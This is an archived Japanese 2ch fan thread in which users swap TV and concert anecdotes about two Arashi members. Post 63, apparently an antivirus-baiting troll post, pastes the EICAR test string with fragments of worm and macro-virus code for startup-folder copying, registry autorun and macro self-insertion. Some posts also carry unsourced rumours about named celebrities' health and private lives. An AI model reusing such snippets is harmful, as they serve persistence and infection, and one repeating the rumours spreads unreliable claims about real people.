5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ぴんとみん【3】

1 :(*`・3・´)人( .゚∀゚ *):2006/12/08(金) 17:00:08 ID:NC4oe07O
傘ぴんとコゾみんのコンビスレです。

ざっつくーる&新聞精神忘れずに。ヌルー最強。
● 他面および他面担叩きは禁止。
● マターリsage進行。
● 同人、真性、緑はヌルーで。
● >950辺りで次スレおながいします。

前スレ
ぴんとみん
http://tv8.2ch.net/test/read.cgi/jan/1133707563/
過去ログ
櫻井翔と二宮和也
http://tv8.2ch.net/test/read.cgi/jan/1091192560/

2 :ななしじゃにー:2006/12/08(金) 17:12:12 ID:tr5RNTr5
>1
乙です

3 :ななしじゃにー:2006/12/08(金) 17:48:47 ID:6G9TO4ZE
スレ立て乙!

4 :ななしじゃにー:2006/12/08(金) 19:07:53 ID:cmdRfG8w
スレ立て超乙&禿d!

5 :ななしじゃにー:2006/12/08(金) 20:39:18 ID:VDPYrkPO
乙カレー!

6 :ななしじゃにー:2006/12/08(金) 21:48:33 ID:TyVwNxfC
>1
スレ立て乙乙!

7 :ななしじゃにー:2006/12/09(土) 05:26:14 ID:cgy3IFz4
>>1
乙です

新曲の踊りでまたお遊びしてホシス

8 :ななしじゃにー:2006/12/09(土) 14:08:39 ID:rs7V7YTF
>1
乙d!

前スレ>998、ぴんみんは皆のものだぞww

9 :ななしじゃにー:2006/12/09(土) 14:35:24 ID:wzykdmJq
>1
乙!トンです。

前スレでも出てたが今日の孫粗のちげーよはツボだった。

10 :ななしじゃにー:2006/12/09(土) 16:19:45 ID:ptXpV8ar
1000 :ななしじゃにー:2006/12/09(土) 13:38:18 ID:ooVGYKOZ
1000なら凱旋もぴんみん満載!

GJ!

11 :ななしじゃにー:2006/12/09(土) 18:09:32 ID:f/4fV/KL
>9
kwsk!

12 :ななしじゃにー:2006/12/09(土) 19:02:46 ID:EY4AGvNZ
>11
孫5人トークで

歪 「最近泣いた?俺は泣いた」
平安 「フラレた?」
歪 「ちげーよ(怒!」
ぴん&みん (その真似で同時に)「「ちげーよ!www」

13 :ななしじゃにー:2006/12/09(土) 19:40:34 ID:42nbIJ/4
>1
乙彼サマー!

GJなお姉ちゃん様のお陰で凱旋はぴんみん満載になりそうだ(*´Д`)

14 :ななしじゃにー:2006/12/09(土) 23:57:51 ID:b9ZTSaYl
糞スレ〜〜〜ッ!!はっo(⌒▽⌒)oけん〜♪ハジメマシテ〜〜〜ッ☆☆(*⌒ヮ⌒*)
うーんとー、私ぃすっごくすっごく暇でー、\(⌒∇⌒)/
探してたら(◎_◎)なんとっ!☆彡(ノ^^)ノ☆彡ヘ(^^ヘ)☆彡(ノ^^)ノ☆彡
馬鹿みたいなスレ♪を発見!!!!(^o^)//""" パチパチパチ
てなわけで、ついつい書いちゃったのらー(o^v^o) エヘヘφ(`∇´)φカキコカキコ♪
削除依頼、出してくれるよねっ。(*^-^*) お・ね・が・い♪(* ̄・ ̄)ちゅ♪ッ
え?くれないのぉ〜?(;¬_¬)そんなのいやいや〜〜、ガ━━━(゚ロ゚)━━━ン
出してくれなかったら、( `_)乂(_´ ) 勝負! \(^o^)/
☆○(゜ο゜)o ぱ〜んち、☆(゜o(○=(゜ο゜)o バコ〜ン!!( ゚▽゚)=◯)`ν゚)・;'パーンチ
(+_+) 気絶中。。。。・゚゚・o(iДi)o・゚゚・。うぇぇん <(゜ロ゜;)>ノォオオオオオ!! (゚□゚;ハウッ!
ということで。(^-^)v>>1は氏ね。じゃあね〜〜〜♪(⌒0⌒)/~~ ほんじゃo(゜▽゜ヽ)(/゜▽゜)o レッツゴー♪
あ、怒ってる? に・げ・ろ〜C= C= C= C=┌(^ .^)┘



15 :ななしじゃにー:2006/12/10(日) 00:14:09 ID:PyHOT99u
ちげーよ乙!!

16 :ななしじゃにー:2006/12/10(日) 12:50:26 ID:yUHq+/pt
ちげーよ(*´Д`)ポワン

17 :ななしじゃにー:2006/12/11(月) 13:48:11 ID:lutQBrmn
D粗の頃、何だったか思い出せないけど、
ぴんみんが同時に同じ言葉を発することが度々あってモエスだった。

18 :ななしじゃにー:2006/12/14(木) 21:34:58 ID:1x55Roid
保守がてらに祈祷w
そろそろ孫か宿題ロケにぴんみんが行きますように

19 :ななしじゃにー:2006/12/16(土) 13:39:23 ID:5QGL9078
どどどどうしよう……!
孫にこんなに感謝する日が来るなんて!!!!

20 :ななしじゃにー:2006/12/16(土) 13:40:11 ID:u2iddrSZ
今日の孫エンディングトークで
のびしてぴんのお腹が出たら、みんがなでナデナデしてた。

21 :ななしじゃにー:2006/12/16(土) 14:09:57 ID:2IMWBvpf
>20
文字だけで萌え氏んだ
カバエエ(*´Д`*)

22 :ななしじゃにー:2006/12/16(土) 14:36:59 ID:GWuXSQ9t
>20
ナデナデ?ペチペチでなくて?
どちらにせよ、カバエエことに変わりはないが(*´Д`*)

23 :ななしじゃにー:2006/12/16(土) 15:27:28 ID:kzYRrkQB
ありゃどっちかと言えばペチペチだな
(*´Д`*)ハァーン

24 :ななしじゃにー:2006/12/16(土) 16:35:50 ID:s62RnGTX
なんだそれ!
はははは早くミタス(´Д`*)

25 :ななしじゃにー:2006/12/17(日) 00:56:43 ID:0NFnhy0Z
今見た。
何であんなに自然と手が出るんだ?
何にもなかったかのように全員がスルー
日常チャメシゴトですかそうですかw
(*´Д`)モヘ

26 :ななしじゃにー:2006/12/17(日) 14:25:33 ID:TmNT7ciV
それ見たくて禿げ上がりそうだyo!
痴呆ってorz


27 :ななしじゃにー:2006/12/17(日) 18:25:54 ID:mnfMtWtE
>26
つべにもう上がってたぞ
詳細は言えんがガンガレ

28 :ななしじゃにー:2006/12/17(日) 19:06:31 ID:cVojgPVC
>>27
d!見れた(*´Д`)モエス

29 :ななしじゃにー:2006/12/17(日) 20:00:41 ID:TmNT7ciV
見れた!(*´Д`*)

触って欲しいのかと疑ってしまうような不自然な腹の出し方だったな。


30 :ななしじゃにー:2006/12/17(日) 23:05:01 ID:1X2ul6XE
ぴんはよくみんのほっぺやおなかの触り心地が良いと自慢してるが
ぴんの触り心地はいいのだろうか?w
みんと違って固そうなんだけど、そこら辺をみんに聞いてみたいなw

31 :ななしじゃにー:2006/12/17(日) 23:20:16 ID:LQHmBDjF
なんとなくみんは低反発、ぴんは高反発っぽいw
つべで見つけきらずにそう思うだけの負け組な自分…

32 :ななしじゃにー:2006/12/18(月) 00:15:42 ID:ddszX8Fh
きもいから

33 :ななしじゃにー:2006/12/18(月) 09:47:24 ID:HkiAutdk
北側同人@マターリ談義パート2
http://comic6.2ch.net/test/read.cgi/doujin/1166091782/

34 :ななしじゃにー:2006/12/19(火) 21:30:36 ID:JJDUARQM
負組みにヒントをorz

35 :ななしじゃにー:2006/12/19(火) 21:35:32 ID:JJDUARQM
おっと見つけてしまった

36 :ななしじゃにー:2006/12/23(土) 14:44:22 ID:MIfhXpIs
OPトークでさり気なくぴん→みんで肩に手置きktkr
低燃費ですよそうですよ

37 :ななしじゃにー:2006/12/24(日) 01:45:20 ID:yc+x6JtS
>36
d!
低燃費ワロス 
地球に優しいんだな。

38 :ななしじゃにー:2006/12/25(月) 16:01:30 ID:jfF9jY0R
虹ッチャオ(*´Д`)GJ
写真集楽しみだ

39 :ななしじゃにー:2006/12/25(月) 21:44:31 ID:j0s7xwlA
>38
kwskおながい

40 :ななしじゃにー:2006/12/27(水) 02:13:12 ID:yIoMNnhh
黄ジャージ着てるみんちゃんが
黒バスロブ着てるぴんちゃんと肩組んでた
その他も何枚か写真出たけどぴんみん隣にいるショットが多かった

なんか小さな萌えだがスマンorz

41 :ななしじゃにー:2006/12/27(水) 02:54:23 ID:7rtyHQBP
>40
39じゃないがdです!
写真集はwktkしてていいんですね(*´∀`)

42 :ななしじゃにー:2006/12/28(木) 14:28:57 ID:gGPASGFw
>40
>39だがd!
wktkしてキタ

43 :ななしじゃにー:2006/12/29(金) 17:57:11 ID:CKvGVXSW
英知でのみん
スキな作品マニアーク杉w
傘チャソ呼びにハアハア

44 :ななしじゃにー:2007/01/01(月) 02:10:13 ID:WQlqJKAN
牛紺、他G曲の時ぴんみん2人でお尻フリフリダンス有り、
ヲタ芸有りでゴチですた。(*´Д`)
今年もいい年迎えられそうですw

45 :ななしじゃにー:2007/01/02(火) 10:38:59 ID:4+QVav8s
>44
d!
ヲタ芸は見れたがお尻フリフリダンスもしてたとは(*´Д`*)



46 :ななしじゃにー:2007/01/02(火) 15:55:37 ID:YnS9sBbR
>44
d!
お尻フリフリダンスって、誘うD・V・Dのくらげの時みたいなやつか?
ヲタ芸は凱旋でも観れそうだな(*´Д`)

47 :ななしじゃにー:2007/01/03(水) 01:19:05 ID:ObzDyUr5
44だが説明ドヘタでスマソ。
お尻フリフリはツイスト?ってダンスみたいなカンジだ。
確かぴんがやり始めたのをみんが見てまねっこ
→途中からぴんが指立ててヲタ芸をやるよ?みたいなカンジでみんに促して2人でヲタ芸
というカンジだった。
禿ホコーリしたよ(*´д`*)

48 :ななしじゃにー:2007/01/03(水) 08:15:17 ID:vDxKttnv
カバエエ(*´Д`*)

49 :ななしじゃにー:2007/01/03(水) 11:20:10 ID:Oi4wt+F6
真似ッコみんカバエエ(´Д`*)にしてもぴんヲタ芸スチだなw

50 :ななしじゃにー:2007/01/03(水) 16:15:50 ID:L8dXLMII
なんか、長瀬が濱崎のことを構ってるのは
女王様の山のように高いプライドと病気のせい。
解離性のなんか抱えてるらしいから。精神的に。
だからLAまで迎えにいったんだよ。
「いまさら誰のことも信じられない」って長瀬を呼んだの。
マネージャーも付き人もメイクも衣装も全部。
どんどん女王様が切っていって、兄しかいなくなって。
そのお兄さんからのSOSを受けて長瀬が迎えにいった、と。

―たったそれだけのことだよ



51 :ななしじゃにー:2007/01/03(水) 17:37:18 ID:Lh2di5pz
↑誤爆?

52 :ななしじゃにー:2007/01/03(水) 18:41:02 ID:QO42Ts5K
傘のコンビスレに対する嫌がらせだろ。
ひらとのコンビスレは回ってないから放置してるな。
なんでいつも山スレだけ荒らされないんだろ、
安置に気付かれてないのかな?

53 :ななしじゃにー:2007/01/03(水) 18:56:47 ID:GjUECSJS
凱旋のぴんみんに期待(*´Д`)

54 :ななしじゃにー:2007/01/03(水) 20:18:34 ID:L8dXLMII
>>52
山スレってなにで検索すれば出てくるの?


+   +
  ∧_∧  +
 (0# ・A・) 騙されたヤシまだぁ〜? マチクタビレター。
 (0゚∪ ∪ +
 と_)_) +




55 :ななしじゃにー:2007/01/03(水) 20:33:32 ID:fhNFZykG
みん→ぴんへの早めの誕生日プレキタ━━(Д゚(○=(゚∀゚)=○)Д゚)━━!!!!

56 :ななしじゃにー:2007/01/03(水) 21:40:04 ID:Oi4wt+F6
>55
コンの話だよな?kwskお願いしますん

57 :ななしじゃにー:2007/01/03(水) 22:40:29 ID:BVcWNl4/
>56
55ではないが
今ハヤリのウィーをあげたそうだ
ぴんは正月に友10人位呼んで遊んだと云っていた


58 :ななしじゃにー:2007/01/03(水) 23:44:32 ID:QO42Ts5K
>54
教えたら荒らしに行くつもりなんだろ
あそこは聖域だから教えてやらん

59 :ななしじゃにー:2007/01/04(木) 00:05:32 ID:ObzDyUr5
凱旋もぴんみんお遊び満載ですた(*´Д`*)
ぴん→みんにお尻タッチ有り。
ビクーリするみんが禿カバエかったw

60 :ななしじゃにー:2007/01/04(木) 00:53:17 ID:7rdDSEkR
>59
ゴチ!

61 :ななしじゃにー:2007/01/04(木) 00:54:16 ID:rCqu6buV
その前に大宮がぴんの尻をサワサワしてたから、仕返しだとオモw

62 :ななしじゃにー:2007/01/04(木) 08:50:53 ID:Fr6kJFbE
>57
56ですが詳細d
しかし十人でWiiってw

63 :ななしじゃにー:2007/01/04(木) 13:13:33 ID:3kJdG4m5
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

64 :ななしじゃにー:2007/01/05(金) 13:51:05 ID:YsDrEwCQ
今回参戦されたお姉ちゃん様は少ないんか脳…。
自分昨日入ったんで覚えてることちょっと落とします。
何の曲か忘れたが花道走る時みんぴんで前後に並んで
手広げてア○レちゃんのキーーーン走りみたいなのやってて禿カバエかったw
あと戦闘歌の前にぴんがみんの顔を手でムニって挟んで
その後ボディーチェックしてたw
その他ヲタ芸や細かいお遊びもイパーイダタヨ(*´Д`*)

65 :ななしじゃにー:2007/01/05(金) 15:00:03 ID:eM7RZ9s5
アンコの時かな?
上に上がるステで投げキッスし合ってたよな?w


66 :ななしじゃにー:2007/01/05(金) 15:05:18 ID:i9BzU+cb
全角…

67 :ななしじゃにー:2007/01/05(金) 19:54:28 ID:RpAVbCsb
>64
なぜか口の中まで見てたなw
他にも愛想前の歪コメ中、二人して新曲wktkみたいな小芝居をしてた。

68 :67:2007/01/05(金) 19:57:23 ID:RpAVbCsb
>67は2行とも本日1恥部のことです。
連投スマソ

69 :ななしじゃにー:2007/01/05(金) 23:10:00 ID:U9yOLT2/
>>67
トン!
2恥部ではコゾ君呼びktkr!
ジヌンたこやき不参戦なので参戦されるお姉ちゃん様いたらよろしくお願いしますん。

70 :ななしじゃにー:2007/01/07(日) 16:24:55 ID:i6KRUHwv
明日たこやき行ってきますん!
禿ぴんみんチェックしてくる!

71 :ななしじゃにー:2007/01/07(日) 17:42:13 ID:tIJvr0qT
>64
ア○レちゃんのキーンは愛甘だったとオモ。カバエカタナ(*´∀`)

たこやき参戦姐ちゃん様、ぴんみんレポ待ってますんw

72 :ななしじゃにー:2007/01/08(月) 04:49:35 ID:vyqjf8bL
7日たこやき1恥部
ピカダボで遠くにいるのに視線のあったぴんとみん。
2人して深ーくおじぎしたあと、どうぞ!みたいに手を広げて紹介する感じで
(昔ダンディ坂野がやってたみたいなw)お互いを紹介しあってた。そのあと2人揃って、
「ご紹介ありがとうございます」ってにこやかにペコッとおじぎしてとして、2人でニタニタ。
遠くにいたのに視線があった時点で(*´Д`)モエス なのに同じ動きをピッタリ同じタイミングで
ふざけるぴんとみんカバエエ!!
これを裏で打ち合わせてきたのかとおもうとさらに(*´Д`)モヘ


73 :ななしじゃにー:2007/01/08(月) 10:27:51 ID:KPbyrS+5
>>72
d!
今回は櫻酒ピカダボ戦闘歌あたりが恒例お遊びっぽいなw
今日たこやき参戦お姐ちゃん様思い切りブチ上がってきてクレ!
ぴんみんチェキまかせた!
そしてレポwktkで待ってる!

74 :ななしじゃにー:2007/01/08(月) 21:17:10 ID:Ke/AeDYd
本日二恥部の出来事。
肌身、一恥部はお辞儀してヲタ芸の流れだったが、二恥部はみんがヲタと踊ってて気付かず。ぴんはみんの方向いて待機、みんぴんに気付いて途中から一緒踊ったけどぴんがヤケクソ気味に見えたw

75 :ななしじゃにー:2007/01/09(火) 05:09:02 ID:eBtUmkKg
レポd!
参加されたお姉ちゃん様、裏山です(*´Д`)
ドームも期待しますん

76 :ななしじゃにー:2007/01/09(火) 15:25:44 ID:Bs7bZ4xU
8日2恥部のこと。
何の歌だったか忘れたんだがorz
メインステで歌っているときの曲に「君」っていう歌詞があって。
その歌詞の前になるとぴんちゃんがみんちゃんの事を禿ガン見しだして
それに気付いたみんちゃんと2人で
「君」のとこで指さしあったり振りを大げさにしたりして遊んでいますた(*´Д`)
後ろ向いて踊ってたからあんま見えなかったけど、2人で笑ってたよ…。
ほんと仲良しだな、オマイラは…(*´Д`)
長文でスマソでした

77 :ななしじゃにー:2007/01/09(火) 20:58:31 ID:1SA32nmp
8日2恥部ラキメン
始めのぴんラプ中にぴんの背中をラプに合わせ
モシャってカンジに触ってるみん
ラプ後ぴんにアイコンタクトで叱られてますたw

78 :ななしじゃにー:2007/01/09(火) 22:38:14 ID:3kCsBOJK
>74
みんに相手にされなかった数秒間のぴんが羞恥でカバエかったw

79 :ななしじゃにー:2007/01/10(水) 01:15:48 ID:Ui2aSUAY
禿ホコ〜〜〜リ(*´Д`*)
レポお姉ちゃん様方トンです!
亀だが未出なようなので自分はしゅうまい初日
雷爆でトラブルによりライトセーバーが出てこなかったぴんに
自分のライトセーバーを譲って本来ぴんが持つはずだったのを
みんが使ってたのに目汁ダタ!
ナイスフォローだよみん!

80 :ななしじゃにー:2007/01/10(水) 01:35:55 ID:xva+Ic70
たこやき二恥部。大宮が初めて新技成功したので、みんが着替えて出てきた時
ぴん「新技成功オメデト」
みん「ありがとうゴザイマス」と言った後
みん「あの、一応最初に別人って設定なってるんでソコ守ってもらえます」
ぴん「ゴメン」みたいなくだりがあった。平安(?)に「オマエがのっかったんだよ」とかみん突っ込まれてた
うっかりアリガト言っちゃったみんカワユス(*´Д`)  
長文スマソ

81 :ななしじゃにー:2007/01/12(金) 00:05:30 ID:oYdPBEL1
http://chakorin.at.webry.info/200701/article_2.html
嵐の櫻井翔と繋がっている主婦(34歳)
『私は彼のバロメーター』


82 :ななしじゃにー:2007/01/12(金) 01:29:40 ID:KpTRgEXZ
>80
レポd!ぴんみんカワユスカワユス(*´∀`*)

今更だが今週の粗宿、ナツラルに間接チッスでワロタw

83 :ななしじゃにー:2007/01/14(日) 16:24:06 ID:ehB7AhgZ
>82
今更ながらに粗宿見たが
間接ちゅー満載で(*´Д`)ホコーリだたな

84 :ななしじゃにー:2007/01/17(水) 09:42:33 ID:rtwx7Mzw
+@ctぴんみんずっと一緒にいたよねのくだりにホコーリ(*´Д`*)

85 :ななしじゃにー:2007/01/20(土) 15:47:22 ID:qSSbKa0B
>>84
みんの方がしきりに二人でいたのをアピールしてるっぽくて
またホコーリするよ。
振り付け一緒に覚えるぴんみんモエス!

そろそろ晩御飯、ぴんみんで見たいんですがのう(*゚∀゚)=3

86 :ななしじゃにー:2007/01/23(火) 01:37:11 ID:FSDqCrnz
みんにゴムパッチン指名されたのに無抵抗なぴんモエスw
「黒い服着てる人」呼びもドS全開で小悪魔みんktkr

87 :ななしじゃにー:2007/01/23(火) 14:03:45 ID:ZB3JgIDB
ノシノシノシ
パッチンで痛がるぴん見て爆笑するみん、ドSww
みんはぴんが弄られると楽しそうだよなw

88 :ななしじゃにー:2007/01/24(水) 17:40:08 ID:EunD8a96
零様またぴんみん萌え企画をおながい。

89 :ななしじゃにー:2007/01/24(水) 22:12:53 ID:Scg2ghYZ
>88
soreda!
いっそスタジオに呼んでやってくださいw

90 :ななしじゃにー:2007/01/25(木) 00:27:35 ID:h9WHWagD
>89
soreda!
一時間たっぷり生ぴんみんが見たい!

91 :ななしじゃにー:2007/01/25(木) 00:32:16 ID:h9WHWagD
sage忘れたorz
しばらく逝ってきます
正座して誘うDVDでも見てくるよ…

92 :ななしじゃにー:2007/01/25(木) 18:16:35 ID:6+StXIWl
あ。 翔ちゃん。
誕生日おめでとう$GBBBB


93 :ななしじゃにー:2007/01/25(木) 18:24:33 ID:L0pqDPw+
ストレートなお祝いキタ━━(Д゚(○=(゚∀゚)=○)Д゚)━━!!!!
          ↑>92

94 :ななしじゃにー:2007/01/25(木) 18:26:55 ID:HA2OIPsD
ハートいっぱいktkr!!

95 :ななしじゃにー:2007/01/25(木) 18:28:31 ID:p7A7dvMV
はぁと四つ(*´Д`*)

96 :ななしじゃにー:2007/01/26(金) 00:44:57 ID:hc5grxMq
あまりのストレートなお祝いっぷりにオロオロしてしまったよ…(*´Д`)カバエエ

97 :ななしじゃにー:2007/01/26(金) 01:44:24 ID:kccyOoEy
はぁとイパーイ(*´Д`)
ぴんちゃんニッキ見てないかな…

98 :ななしじゃにー:2007/01/27(土) 14:30:09 ID:oUsYPYpF
ぴんみん孫・・・
孫・・・ 来ない・・・
  Λ_Λ
 ( ´∀`)
 (   )
 | | |
 (__)_)

  Λ_Λ
 (;´∀`)
 (   )
 | | |
 :::::::::

  Λ_.::.
 ( ´∀`:
 :::::::::
 :::::::::

 .:.....:.
 :::::::::
 :::::::::
 ::: :: ::

99 :ななしじゃにー:2007/01/28(日) 00:10:59 ID:rG8KD4KH
>98
イ`

100 :ななしじゃにー:2007/01/30(火) 01:23:13 ID:/olq6wxz
ハンバーグおててうようよ
ぴんちゃんカバエエktkr!!

101 :ななしじゃにー:2007/01/30(火) 16:36:10 ID:7wBKPEtj
>100
ktkr!!
ぴんちゃんリアルに呟き杉…(*´Д`)

102 :ななしじゃにー:2007/02/01(木) 13:33:36 ID:Wr6+MZIq
黄色のWSとスポ紙がみんからぴんコメ多くてモヘ(´Д`*)
見どころ半ケツ。みんGJ!

103 :ななしじゃにー:2007/02/01(木) 13:39:45 ID:6t6LPKeb
>102
ノシ
バカッポーの会話にしか思えない…
みんちゃんGJ!

104 :ななしじゃにー:2007/02/05(月) 12:31:47 ID:Q/qHQNNC
聞き逃したんだけどぴんラジオで新曲PV撮影時
ぴんはみんとずっとグリンピースやってたとか?
ホコーリ(*´Д`*)

105 :ななしじゃにー:2007/02/05(月) 18:42:07 ID:LeHCf5y5
>>104
ノシ
しかも10時間近くあった撮影中
ずっとやってたらしいね!
それで暇潰しのできるぴんみんにホコーリw
せの話だけで5杯は丼飯いきます!

106 :ななしじゃにー:2007/02/05(月) 19:13:45 ID:PFbXTcDG
な、ちょ、mjdk!w
10時間もひっつきもっつきで、負けじとグリンピースするぴんみん……
想像しただけでハァン(*´Д`*)

107 :ななしじゃにー:2007/02/05(月) 19:41:37 ID:Q/qHQNNC
またメイキングを付けてくれたらよかったのにな…無念。

108 :ななしじゃにー:2007/02/05(月) 22:17:14 ID:oReazsEa
蛇波のレポにほんのりwktkしてみる

109 :ななしじゃにー:2007/02/10(土) 12:41:22 ID:g8TqLWkH
12日0にぴんみんクルー?
ベルリン映画祭取り上げるなら
異国の地で心細いみんに
ぴんが同行したらいいジャマイカ!

110 :ななしじゃにー:2007/02/11(日) 00:53:45 ID:EWQ76SDG
>109
ノシ
同じこと思った
ぴんがみんをずっと密着取材したらいいジャマイカ!

111 :ななしじゃにー:2007/02/12(月) 18:01:02 ID:WYiqp1Ta
零wktk超(*´Д`*)

112 :ななしじゃにー:2007/02/13(火) 00:37:37 ID:VDCjWv27
質問がいつもお決まりのパターンなんだよなあ。
ぴんのコメントも聞きたかったけど零ありがd。

113 :ななしじゃにー:2007/02/13(火) 01:18:27 ID:Z0zAYZv5
みんちゃんの「ぴんさん」呼び(*´Д`)
あと、小窓に映るぴんちゃんに萌えますた
零d

114 :ななしじゃにー:2007/02/13(火) 01:56:37 ID:fvDH5tw8
さ、続いてはこちらです!

の後ろのぴんに萌ヘW

115 :ななしじゃにー:2007/02/13(火) 01:57:11 ID:s/sFD+d7
イチメンでのクリントとの3Shotに限りなく(*´Д`)モエス

116 :ななしじゃにー:2007/02/13(火) 03:40:45 ID:13vTVbhS
海を越えたみんと小窓のぴんはお宝だなヲイ

117 :ななしじゃにー:2007/02/13(火) 09:01:02 ID:YArE6CUa
忙しいスケだろうにちゃんと零チェキしてるみんさすがだw
>112
ノシ
歪の時みたいにぴんコメント欲しかったよな

118 :ななしじゃにー:2007/02/14(水) 01:10:45 ID:y7503IJm
>114
ノシ
なんだあの顔はww

119 :ななしじゃにー:2007/02/14(水) 20:55:16 ID:jcljxQ6z
>>118
まったり見守る母の顔に見えたぞw

120 :ななしじゃにー:2007/02/14(水) 21:06:35 ID:QK6UTo02

   ノノノ
 ( ^∀^) ぉむつ部長だょ?
 ⊂__つ
  (ヽ ゚゚ ノ
  ∪∪



121 :ななしじゃにー:2007/02/16(金) 16:03:40 ID:GoYh7UVA
おまいら、6月17日に「世界遺産検定」があるの知ってるか?w

122 :ななしじゃにー:2007/02/16(金) 18:41:03 ID:GjeQdFh5
>121
ちょwwww

123 :ななしじゃにー:2007/02/16(金) 21:01:32 ID:RXZnbSRu
コソコソお話するぴんみん(*´Д`)

124 :ななしじゃにー:2007/02/16(金) 21:03:00 ID:3ti6Un3u
振り中に顔見合わせてちょこっとおふざけするぴんみん(*´Д`*)ハァン

125 :ななしじゃにー:2007/02/17(土) 02:35:15 ID:5aw2DWPE
遅れて到着したみんに嬉しそうに手を振るぴん(*´д`*)

126 :ななしじゃにー:2007/02/17(土) 07:13:44 ID:GdxAx90z
みんのおふざけ手叩き指差しを真似するぴん(*´Д`*)

127 :ななしじゃにー:2007/02/17(土) 11:09:15 ID:0qE4JJik
あれ松村だよな?w古っw

128 :ななしじゃにー:2007/02/18(日) 23:40:51 ID:ydTmVKii
ブログ廻りしてたらタモステ番協のレポハケーン!(・∀・)


ぴ ん 、 み ん の 耳 た ぶ い じ る


ハァハァハァ━━━━━━━━*´Д`*━━━━━━━━ン!!!!!



129 :ななしじゃにー:2007/02/19(月) 00:00:22 ID:BHtgjbXF
>128
kwsk!!(*;`Д´)ハァハァッ

130 :ななしじゃにー:2007/02/19(月) 01:05:10 ID:wk4mbXJF
>128
mjdk!いじるって…!
久しぶりの再会がよっぽど嬉しかったか、ぴんちゃん(*´Д`*)

131 :ななしじゃにー:2007/02/19(月) 01:56:38 ID:F/5nzkzt
>128
ちょwぴんご乱心www

132 :ななしじゃにー:2007/02/19(月) 21:44:46 ID:SeL4I/BC
電話BOXでぴんが1人で入ってる時だけ
ドアのとこにくっついてるみんモヘ(´∀` )

133 :ななしじゃにー:2007/02/19(月) 23:50:53 ID:sVNbqGpg
ここ?blogの内容鵜呑みにするスレッドて(笑)

134 :ななしじゃにー:2007/02/20(火) 00:28:25 ID:WO9TOB3y
>128
何故それを映ってるところでやらないのかと小一時間(ry

135 :ななしじゃにー:2007/02/20(火) 01:24:08 ID:QoaMNKQR
>132
ノシ
みん、すげーじっと見てたよな(*´Д`)カバエエ…

あと電話箱に最初5人でぎゅっと入ったときに
ぴんの肩にハソバグお手手が置いてあったように見えたんだが…
幻覚だろうか?w

136 :ななしじゃにー:2007/02/20(火) 01:26:37 ID:UIOhFb92
ちゃっかりとお手手置いてたなw
カバエエ

137 :ななしじゃにー:2007/02/20(火) 02:24:18 ID:/FeISo0Q
チャイナみんにやたら絡んで触るぴんに萌え。
そんなにスチかそんな(ry

138 :ななしじゃにー:2007/02/20(火) 05:43:05 ID:rktqueLD
あれ?ここに北町のナポレオソが来てるって聞いたんですけどね…………

139 :ななしじゃにー:2007/02/21(水) 22:25:36 ID:60sEKcDC
傘は世界遺産検定知ってたんだなw

140 :ななしじゃにー:2007/02/21(水) 23:23:39 ID:86F/CpuT
鯵紺パンフレットぴんみん満載カバユス(*´∀`*)

141 :ななしじゃにー:2007/02/22(木) 21:26:46 ID:OuSpjGyz
うた●んにて顔見合わせふざけあいっこ再来(*´Д`*)

142 :ななしじゃにー:2007/02/22(木) 23:45:30 ID:g9mwcSkb
みんのパネルを運ぶぴん(*´Д`)

143 :ななしじゃにー:2007/02/23(金) 01:57:06 ID:GMwVkAUh
>141
毎回あんなことされると禿げ上がりそうです(*´Д`*)
でも今日の音楽駅もwktk

>142
ノシ
ぴんとパネルみんとの2ショトにも萌えた(*´Д`*)

144 :ななしじゃにー:2007/02/23(金) 17:23:03 ID:QusAsviS
今日発売の$二誌(*´Д`*)
ぴんどんだけパズル大事なんだyo!

145 :ななしじゃにー:2007/02/23(金) 20:27:48 ID:qy+VKa7f
>140
ずっとあんな様子だったのか脳…(*´Д`)

25 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)